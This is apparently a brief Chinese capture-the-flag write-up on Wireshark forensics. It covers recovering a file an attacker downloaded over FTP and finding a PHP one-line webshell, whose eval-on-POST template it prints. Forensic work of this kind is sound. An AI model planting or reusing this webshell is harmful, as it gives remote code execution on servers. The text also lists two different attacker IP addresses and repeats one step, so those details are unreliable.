- 使用 WireShark 打开日志文件 log.pcpng
- 获取恶意用户下载的文件
- 方法一:通过对 FTP-DATA 对象导出,可知下载了名为 flag 的文件,通过 save 可获取文件
- 方法二:通过过滤 FTP 发现恶意用户使用了 LIST、RETR 等指令,其中 RETR 指令用于让服务器克隆一份指定的文件,由此推出下载了 flag 文件,可以过滤 FTP-DATA 通过追踪 TCP 流导出文件内容
- 方法一:通过对 FTP-DATA 对象导出,可知下载了名为 flag 的文件,通过 save 可获取文件
- 同时知道了恶意用户的地址为 10.10.1.131,可通过
ip.src==10.10.1.128 && tcp.flags.ack
方法进行过滤,在获取 flag 文件的位置附近可找到 php 一句话木马的目录与内容,其中,密码在木马中的位置为<?php @eval($_POST['密码']);?>
-End-
标签:FTP,文件,flag,CTF,过滤,wp,服务器,日志 From: https://www.cnblogs.com/SRIGT/p/17321784.html